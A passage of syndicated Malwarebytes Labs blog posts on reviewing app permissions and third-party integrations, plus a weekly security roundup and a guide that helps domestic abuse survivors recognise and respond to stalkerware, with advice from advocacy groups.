These are just the measures taken against apps that are potentially harmful. We shouldn’t forget those that invade or risk your privacy. What’s important to remember here is that when you are installing apps from other unknown sources, they most likely didn’t have to pass any scrutiny at all—and are a likely security or privacy risk.

A regular check of your list of apps may result in some good device-cleaning, which not only reduces your attack surface, but also might improve your device’s performance and speed. While you’re at it, check the permissions on some of the apps that you decide to keep. They may not need all of them to do what you want or expect the app to do for you.

When an app asks for permissions, carefully read what it is asking for and let that sink in before you allow it. I know that these requests always seem to come at an inconvenient moment. You are in a hurry and you want that notification out of your way so you can carry on and use the app.

But consider why a gaming app is asking for access to GPS location. Or how come that financial app wants access to all of your contacts. Is the app really worth turning over that private information? Also note that these requests are not limited to the install process. They may come after an update or when you are trying a new feature.

Partial solutions

Right now, without more user awareness of the security risks of integration, and without the applications, software programs, or social media platforms narrowing down their permissions requests to only what’s necessary to make the program work, there are only partial solutions for those looking for convenient installation or login processes. However, these solutions do improve your overall security posture without sacrificing too many benefits.

When it comes to integrations, there are a few tips we are happy to share.


If you decide to unpair your apps and websites from Facebook, follow the directions below:

  • Under the Facebook menu, go to Settings.
  • Under Security, select Apps and websites then click on the “Logged in with Facebook” section.
  • Select to remove all the entries that you will no longer be using. You can also see what information each app was able to retrieve from your Facebook profile. Quite an eye-opener.

Google has an informative page in their Help Center about giving third-party apps access to your Google account. It reads:

“Depending on how you use Google products, some of the information in your account may be extra sensitive. When you give access to third-parties, they may be able to read, edit, delete, or share this private information.”

The integration between Gmail and Google calendar can be rendered less automated (and thus less of a security risk) by turning off the automatic calendar invitations feature. Here are the directions:

  • Go to the Event settings menu in Google Calendar and disable the “Automatically add invitations” option.
  • Enable the “Only show invitations to which I’ve responded” option instead.
  • Also make sure that “Show declined events” in the View Options section is left unchecked.

Twitter has a similar page as Google called About third-party applications and log in sessions which warns:

“You should be cautious before giving third-party applications access to use your account.”

The page also provides information on how to remove access for sites and apps. Have a look and check for any unexpected guests.

Cooperating apps

I realize that cooperating apps are designed to make our life easier. After all, it’s frustrating if the left hand doesn’t know what the right hand is doing. And when everything works seamlessly together, our online life has a natural flow. I’m just asking you to give it some thought before you blindly allow integrations and permissions.

It looks as though users have shifted mindsets from “I have nothing to hide” to “They already know everything anyway.” But in both cases, it is true that you don’t have to hand your personal data to “them” on a silver platter, no matter who they are. Your personal information is too valuable to just give away. After all, that’s why cybercriminals (and legitimate organizations) are after it to begin with.

Stay safe out there!

The post Cooperating apps and automatic permissions are setting you up for failure appeared first on Malwarebytes Labs.


A week in security (June 24 – 30)

Malwarebytes - Mon, 07/01/2019 - 17:02

Last week on Malwarebytes Labs, we peeled back the mystery on an elusive malware campaign that relied on blank JavaScript injections, detailed for readers our latest telemetry on the tricky GreenFlash Sundown exploit, and looked at one of the top campaigns directing traffic toward scareware pages for Microsoft’s Azure Cloud Services.

We also doubled down on our commitment—and significantly increased efforts—to detect stalkerware on victims’ devices.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (June 24 – 30) appeared first on Malwarebytes Labs.


Helping survivors of domestic abuse: What to do when you find stalkerware

Malwarebytes - Mon, 07/01/2019 - 16:51

We’re going to talk about something different today. We’re going to talk about domestic abuse.

Earlier this year, cybersecurity company Kaspersky Lab announced that the latest upgrade to its Android app would inform users about whether their devices were running stealthy, behind-the-scenes monitoring apps sometimes referred to as stalkerware.

This type of software can track unsuspecting victims’ locations, record phone calls, peer into text messages and emails, pry into locally-stored photos and videos, and rifle through web browsing activity, all while hidden from view.

Though often, and shamelessly, advertised as a tool for parents to track the activity of their children, these apps are commonly used against survivors of domestic abuse.

It comes as no surprise. Stalkerware coils around a victim’s digital life, giving abusive partners what they crave: control.

Electronic Frontier Foundation Cybersecurity Director Eva Galperin, who pushed Kaspersky Lab into improving its product, told Motherboard at the time of the company’s announcement:

“I would really like to see other [antivirus] companies follow suit, so that I can recommend them instead of just one company that has shown that they are committed to doing this… I’d like to see this be the industry standard so it doesn’t matter which product you’re downloading.”

Malwarebytes stands by this commitment, as we have for years.

But starting today, we’re going to do more than improve our stalkerware detection capabilities. We’re going to help survivors understand this danger and know what to do if they’re being digitally tracked.

Finding proof of stalkerware

Stalkerware presents a unique detection problem for its victims—it often hides itself from public view, and any attempt to find it could be recorded by the stalkerware itself.

Further, the US government has done little to help. Despite a previous FBI investigation that led to the court-ordered shut down of the stalkerware app StealthGenie, countless other stalkerware apps still operate today.

CitizenLab, a research institution at the University of Toronto that focuses on technology and human rights, recently produced a study on the harms of stalkerware. Researchers studied eight apps based on their monitoring capabilities and relative popularity—analyzed through Google Trends, web searches, and “best of” lists. The study focused on the following apps, which are used in the US, Canada, and Australia: FlexiSpy, Highster Mobile, Hoverwatch, Mobistealth, mSpy, TeenSafe, TheTruthSpy, and Cerberus.

Malwarebytes Labs has previously written about the technological signs of stalkerware—quickly-depleting battery life, increased data usage, and longer response times than usual—but we wanted to explore what stalkerware looks like from a behavioral aspect. We spoke to multiple domestic abuse networks and advocacy groups, and one troubling fact arose repeatedly:

Symptoms of stalkerware are not proof of stalkerware.

Erica Olsen, director of the Safety Net project for the National Network to End Domestic Violence, said her organization consistently hears stories from domestic abuse survivors who are struggling to explain how their partners know about their phone calls, text message conversations, emails, and even visited locations.

“Survivors could come to law enforcement and say ‘My ex knows about the text messages I sent, and I don’t know how they know that,’” Olsen said. But, she said, the signs don’t always guarantee the use of stalkerware.

“Could the [recipient] have just told [the ex]?” Olsen said.

In determining the presence of stalkerware, Olsen said survivors should assess several factors:

  • Does their abusive partner have physical access to their device—a common situation for couples who live together?
  • Does their abusive partner know the passcode to unlock a device—another situation that depends on whether an abusive partner even allows their victim that level of agency and freedom?
  • Can their abusive partner view call logs on their device, learning who was called, how often, and for how long?
  • Does their abusive partner know the content of phone calls?
  • For domestic abuse survivors who have physically escaped their abuser, do their abusers still know about recently-taken photographs, locations visited, and any information that is typically locked behind an account or device passcode?

Further, Olsen said that domestic abuse survivors should study how the private information is being used by an abuser.

“Abusers will end up hinting at all the things they know that they shouldn’t know,” Olsen said. “That is the most frequent thing we hear from survivors, advocates, and law enforcement—the number one thing is identifying that an abuser knows way too much.”

Olsen continued: “They know text messages, emails, they have access to accounts logged into via [the survivor’s] phone. That’s when we immediately have to start talking to survivors about what they think is safe.”

While every safety plan is unique, and every domestic abuse situation nuanced, Olsen offered one top-level piece of advice that applies to all survivors: Trust yourself. You know the feeling of being watched and controlled—whether through physical, emotional, mental, or digital means. You should trust those feelings and never discount your own concerns. 

The following ideas do not present a catch-all “solution” to finding stalkerware on a device. Instead, they present information that will hopefully guide survivors toward safety.

Evaluate your own level of safety

Determining what is safe for you is crucial. What you discover in this process can impact what other steps you take after learning about or suspecting the presence of stalkerware on your device.

Ask yourself several questions about what steps you can reliably take.

  • Do you have people you can ask for support?
  • Can you communicate with those people from a safe, non-monitored device?
  • Can you change your social media account passwords?
  • Can you change your own device passcode?
  • Are you allowed to have a device passcode?
  • Can you install antivirus and anti-malware programs on your own device?
  • What would be the consequences of your abusive partner discovering that you are trying to get rid of stalkerware?
  • Do you want to bring in law enforcement?

If all this seems overwhelming, remember that the National Domestic Violence Hotline is there to help.

Your every move might be recorded

When determining your own level of safety, it’s important to remember that everything you do on your compromised device could be recorded and watched by an abusive partner. That means your web browsing activity, your text messages, your emails, and all of your written correspondence could be far from private.

Know what apps are on your phone and what permissions they’re allowed

Olsen advised that domestic abuse survivors know what apps are on their devices at any given moment. While this guideline does not reliably catch hidden stalkerware apps, it does give you an opportunity to understand what other apps might have been installed on your device in an attempt to surveil you.

Remember, abusive partners do not need stalkerware to victimize and control their partners. Instead, Olsen said, abusers can rely on technology misuse.

“The vast majority of our work is in looking at misuses of general technologies that have 100 different good uses, that are never intended to be misused,” Olsen said. “The ownership [of abuse] is always on the abuser for their behavior. If you remove technology, you’re still going to have an abusive person.”

Shaena Spoor, program assistant with W.O.M.A.N. Inc., offered a couple of examples of technology misuses that she has heard about.

“We had some concerns with Snap Maps,” Spoor said about the Snapchat feature rolled out in 2017 that let users find their friends’ locations. Every user who agreed to share their location had it updated with each use of the app.

“For some people, they didn’t realize that locations had been [turned] on,” Spoor said. “If you don’t use the app very often, you’re just sitting on a map, super findable.”

Spoor said she also heard of domestic abuse survivors whose locations were tracked through the use of the location-tracking product Tile. Though sold as a legitimate way to track luggage, wallets, and purses, the small plastic device can also be snuck by a domestic abuser into a jacket or work bag. When the abuser loads up the Tile app, they can then see the real-time location of that device—and thus, of its carrier.

“People use Tile, for example, and hide them in survivor’s stuff,” Spoor said. “[Survivors] are showing up at domestic violence shelters and finding it hidden in a bag.”

Create new online account logins and passwords from a safe device

This one comes straight from the National Network to End Domestic Violence’s Technology Safety project. You should think about making new account logins and passwords.

As one of the Technology Safety project’s many resources says:

“If you suspect that anyone abusive can access your email or Instant Messaging (IM), consider creating additional email/IM accounts on a safer computer. Do not create or check new email/IM accounts from a computer that might be monitored.”

The Tech Safety resource also advises you to open new accounts with no identifying information, like real names or nicknames. This step should be considered for all important online accounts, including your banking and social media accounts.

Always remember to do this from a safe computer that is not being monitored.

Factory reset or toss your device

Multiple organizations recommended that any stalkerware victim take immediate steps to toss, or wipe clean, their current device. There are a few options:

  • Toss your device and buy a new one
  • Factory reset your device
  • Keep your compromised device, but purchase a new phone that you use for confidential conversations

Olsen advised that every situation has its own unique challenges, and she urged domestic abuse survivors to consider the potential outcomes of whatever option they choose. She said her organization works closely with domestic abuse survivors to come up with the best plan for them.

“We think about the abuser, who no longer has remote access to [the survivor]—they will try to get physical access, and that is a real concern which absolutely could happen,” Olsen said. “If the survivor thinks that [might happen], we try alternatives—buying a pay-as-you-go phone, use it to have critical conversations, private ones, but still keep the regular phone for silly things and to keep the [abuser] at bay.”

Chris Cox, founder of Operation Safe Escape, which works directly with domestic abuse networks, shelters, and law enforcement to provide operational and cybersecurity support, echoed similar advice.

“What we always advise, consistently, if an abuser ever had access to the device, leave it behind. Never touch it. Get a burner,” Cox said, using the term “burner” to refer to a prepaid phone, purchased with cash. “You have to assume the device and the accounts are compromised.”

Further, Cox cautioned survivors against trying to wipe stalkerware from a device, as it could introduce a “new vulnerability” in which an abuser learns—through the stalkerware itself—that their victim is trying to thwart them.

Instead, Cox said, “whenever possible, the device is left behind.”

Approach law enforcement

Working with the police is a step taken by survivors who want to take legal action, whether that means eventually obtaining a restraining order or bringing charges against their abuser.

Because of this step’s nuance, proceed with caution.

Olsen said that, in the successful cases she has heard of where survivors worked with local police, the survivors already had a firm safety plan in place and had built a relationship with domestic abuse shelters and advocates. She said that, together with their support network, survivors have managed to get confessions out of their abusers.

But, Olsen stressed, trying to get an abuser to admit to their abusive and potentially criminal behavior is not a step to be taken alone.

“I do not suggest doing this in isolation, but if they’re working with advocates, I have heard of some survivors strategically communicating with abusers,” Olsen said. “It is amazing how many times abusers admit to [using stalkerware].”

Also, survivors should be wary of how police can be used against them, said Cox.

“Abusers, as a whole, are adept at using the law as a weapon,” Cox said. “If a phone belongs to a victim, and it happens to be in the abuser’s name, if the victim leaves and the abuser reports it stolen, [law enforcement] are used as a weapon to track the victim down.”

Call the National Domestic Violence Hotline

If you find stalkerware on your device, or you have strong suspicions about an abusive partner knowing too much about your personal life—with details from text messages and knowledge of private photos—call the hotline from a safe device.

The number for the National Domestic Violence Hotline is 1−800−799−7233.

The hotline’s trained experts can help you find the safest path forward, all while maintaining your confidentiality.

Seek help from various online resources

If you want to find more information online, from a safe device, read through any of these resources about dealing with domestic abuse, stalkerware, and the misuse of technology:

Malwarebytes has also written a few articles on types of technology, malicious or not, that are often abused to their victims’ detriment. Awareness of what’s out there and how it can be used against you can help you stay safe:

And if you are able to install an anti-malware program on your mobile device, running a scan with Malwarebytes for Android can help you detect and remove stalkerware apps—as well as keep a log of which apps were installed on your phone, which is valuable information if you choose to work with law enforcement.

We’re here for you. We care. And we’ll always do what we can to help users have a safe online—and offline—experience with technology.

Stay tuned for our next article in our stalkerware series, which will explore which monitoring apps are safe for parents to use, and which should be avoided. Stay safe.

The post Helping survivors of domestic abuse: What to do when you find stalkerware appeared first on Malwarebytes Labs.
